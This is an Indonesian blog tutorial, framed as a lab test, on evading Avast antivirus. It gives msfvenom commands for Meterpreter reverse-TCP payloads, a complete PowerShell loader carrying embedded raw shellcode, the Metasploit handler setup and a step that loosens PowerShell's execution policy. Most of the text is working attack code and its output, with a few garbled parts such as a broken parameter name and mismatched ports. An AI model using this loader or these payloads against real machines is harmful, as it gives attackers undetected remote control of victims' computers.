Di tahun 2022 ini virus sudah umum kita temukan, yang akan menyerang device kita dan antiviruslah peran sangat penting untuk menangkal virus yang menyerang device kita. Bisa dibilang dengan adanya antivirus berbagai serangan baik itu malware,adware, dan virus pada umumnya tidak dapat menyerang pada perangkat kita, tapi bagaimana jika kita dapat membypass antivirus agar program virus kita dapat berjalan tanpa terditeksi oleh antivirus.
Disini saya akan melakukan test lab untuk membypass antivirus avast dan ini adalah avast versi terbaru. Pertama saya akan test membuat payload biasa dengan perintah:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > test.exe
Kita akan test ke web virustotal dan mendapatkan hasil seperti digambar.
Terlihat shell kita terditeksi pada setiap antivirus, sekarang kita jalankan pada windows yang terdapat antivirus avastnya, untuk memastikan apakah terditeksi.
Sudah dipastikan akan terditeksi virus pada Avast, selanjutnya kita akan membuat payload dengan format powershell yaitu "ps1" dengan tambahan code untuk membypass antivirus avastnya.
Kalian dapat mengikuti script code dibawah ini dan tambahkan shell code dengan perintah :
Payload untuk 32bit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
Payload untuk 64bit:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f powershell
script code :
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -p assthru;
[Byte[]];
[Byte[]] $sc = 0xfc,0xe8,0x8f,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0xf,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x1,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x1,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x1,0xd3,0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xc0,0xc1,0xcf,0xd,0xac,0x1,0xc7,0x38,0xe0,0x75,0xf4,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x1,0x7,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
Kita lanjutkan sekarang untuk test pada virustotal, akan tampil seperti dibawah ini:
Terlihat bahwa pada antivirus avast tidak terditeksi sebagai ancaman atau virus, walapun terdapat 6 antivirus yang menditeksinya sebagain ancaman, kita lanjutkan dengan scanning virus di avast dengan kondisi file sudah ada diwindows.
Dapat dilihat file tidak terditeksi sebagai virus atau ancaman, sekarang kita test menjalankan script tersebut dipowershell dan jangan lupa aktifkan metasploit dengan module:
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp #untuk 32bit
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp #untuk 64bit
msf6 exploit(multi/handler) > set lhost 192.168.1.7 #INI IP KAMU YANG DIBUAT DI MSFVENOM
lhost => 192.168.1.7
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.7 yes The listen address (an interface may be specified)
LPORT 7788 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.7:7788
Selanjutnya kita akan execution payload diwindows seperti dibawah ini:
Diatas terlihat kita tidak dapat menjalankan program dikarenakan policy pada powershellnya bukan karena antivirusnya. Kita akan mensetting scope execution powershell dapat menjalankan script kita.
Lakukan sesuai perintah dibawah:
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Undefined
PS C:\Users\User\Desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the about_Execution_Policies help
topic at https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
PS C:\Users\User\Desktop> Get-ExecutionPolicy -Scope CurrentUser
Unrestricted
Kita sudah melakukan perubahan policy pada powershell, sekarang kita ulangi menjalankan payload kita dengan perintah:
C:\WINDOWS\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\WINDOWS\system32> cd C:\Users\User\Desktop\
PS C:\Users\User\Desktop> .\avtest.ps1
Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\Users\User\Desktop\avtest.ps1?
[D] Do not run [R] Run once [S] Suspend [?] Help (default is "D"): R
IsPublic IsSerial Name BaseType
-------- -------- ---- --------
True True Byte[] System.Array
447807488
447807489
447807490
447807491
447807492
447807493
447807494
447807495
447807496
447807497
447807498
447807499
447807500
447807501
447807502
447807503
447807504
447807505
447807506
.................
Jika sudah seperti diatas tanpa program mengalami not responding makan exploit berhasil dan akan berjalan seperti dibawah:
sampai sini dapat kalian peraktekan pada lab masing-masing jika ada kendala dapat comment dibawah.
Posting Komentar